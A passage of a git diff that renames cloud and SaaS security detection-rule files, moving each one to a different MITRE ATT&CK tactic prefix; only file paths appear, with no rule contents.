a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml similarity index 100% rename from rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml rename to rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml rename to rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml similarity index 100% rename from rules/integrations/aws/impact_iam_deactivate_mfa_device.toml rename to rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml rename to rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml similarity index 100% rename from rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml rename to rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml similarity index 100% rename from rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml rename to rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml similarity index 100% rename from rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml rename to rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/defense_evasion_rds_instance_made_public.toml similarity index 100% rename from rules/integrations/aws/persistence_rds_instance_made_public.toml rename to rules/integrations/aws/defense_evasion_rds_instance_made_public.toml diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml similarity index 100% rename from rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml rename to rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml similarity index 100% rename from rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml rename to rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/defense_evasion_route_table_created.toml similarity index 100% rename from rules/integrations/aws/persistence_route_table_created.toml rename to rules/integrations/aws/defense_evasion_route_table_created.toml diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml similarity index 100% rename from rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml rename to rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml similarity index 100% rename from rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml rename to rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml similarity index 100% rename from rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml rename to rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml similarity index 100% rename from rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml rename to rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml rename to rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml similarity index 100% rename from rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml rename to rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/impact_sqs_purge_queue.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_sqs_purge_queue.toml rename to rules/integrations/aws/impact_sqs_purge_queue.toml diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/initial_access_ec2_instance_console_login.toml similarity index 100% rename from rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml rename to rules/integrations/aws/initial_access_ec2_instance_console_login.toml diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml similarity index 100% rename from rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml rename to rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml rename to rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/persistence_iam_update_assume_role_policy.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml rename to rules/integrations/aws/persistence_iam_update_assume_role_policy.toml diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/persistence_iam_user_addition_to_group.toml similarity index 100% rename from rules/integrations/aws/credential_access_iam_user_addition_to_group.toml rename to rules/integrations/aws/persistence_iam_user_addition_to_group.toml diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml similarity index 100% rename from rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml rename to rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/persistence_sts_get_federation_token.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_sts_get_federation_token.toml rename to rules/integrations/aws/persistence_sts_get_federation_token.toml diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/persistence_sts_role_chaining.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_sts_role_chaining.toml rename to rules/integrations/aws/persistence_sts_role_chaining.toml diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_oidc_provider_created.toml rename to rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml similarity index 100% rename from rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml rename to rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml similarity index 100% rename from rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml rename to rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/collection_key_vault_excessive_retrieval.toml similarity index 100% rename from rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml rename to rules/integrations/azure/collection_key_vault_excessive_retrieval.toml diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml similarity index 100% rename from rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml rename to rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml rename to rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml rename to rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml rename to rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml rename to rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml rename to rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml similarity index 100% rename from rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml rename to rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/defense_evasion_automation_account_created.toml similarity index 100% rename from rules/integrations/azure/persistence_automation_account_created.toml rename to rules/integrations/azure/defense_evasion_automation_account_created.toml diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml rename to rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml rename to rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml rename to rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml rename to rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml rename to rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml rename to rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml rename to rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml rename to rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml rename to rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml similarity index 100% rename from rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml rename to rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml similarity index 100% rename from rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml rename to rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml similarity index 100% rename from rules/integrations/azure/discovery_storage_blob_container_access_modification.toml rename to rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml rename to rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml similarity index 100% rename from rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml rename to rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml similarity index 100% rename from rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml rename to rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml rename to rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml similarity index 100% rename from rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml rename to rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/persistence_storage_account_key_regenerated.toml similarity index 100% rename from rules/integrations/azure/credential_access_storage_account_key_regenerated.toml rename to rules/integrations/azure/persistence_storage_account_key_regenerated.toml diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml similarity index 100% rename from rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml rename to rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml similarity index 100% rename from rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml rename to rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml similarity index 100% rename from rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml rename to rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml similarity index 100% rename from rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml rename to rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml similarity index 100% rename from rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml rename to rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml similarity index 100% rename from rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml rename to rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml similarity index 100% rename from rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml rename to rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml similarity index 100% rename from rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml rename to rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml similarity index 100% rename from rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml rename to rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml similarity index 100% rename from rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml rename to rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/collection_high_number_of_cloning_by_user.toml similarity index 100% rename from rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml rename to rules/integrations/github/collection_high_number_of_cloning_by_user.toml diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/defense_evasion_github_app_deleted.toml similarity index 100% rename from rules/integrations/github/execution_github_app_deleted.toml rename to rules/integrations/github/defense_evasion_github_app_deleted.toml diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml similarity index 100% rename from rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml rename to rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/persistence_new_github_app_installed.toml similarity index 100% rename from rules/integrations/github/execution_new_github_app_installed.toml rename to rules/integrations/github/persistence_new_github_app_installed.toml diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml similarity index 100% rename from rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml rename to rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml similarity index 100% rename from rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml rename to rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml similarity index 100% rename from rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml rename to rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml similarity index 100% rename from rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml rename to rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml similarity index 100% rename from rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml rename to rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml similarity index 100% rename from rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml rename to rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml similarity index 100% rename from rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml rename to rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml similarity index 100% rename from rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml rename to rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml similarity index 100% rename from rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml rename to rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml similarity index 100% rename from rules/integrations/kubernetes/discovery_denied_service_account_request.toml rename to rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml rename to rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml rename to rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml rename to rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml rename to rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml rename to rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml rename to rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml rename to rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/execution_privileged_pod_created.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml rename to rules/integrations/kubernetes/execution_privileged_pod_created.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml rename to rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml rename to rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml similarity index 100% rename from 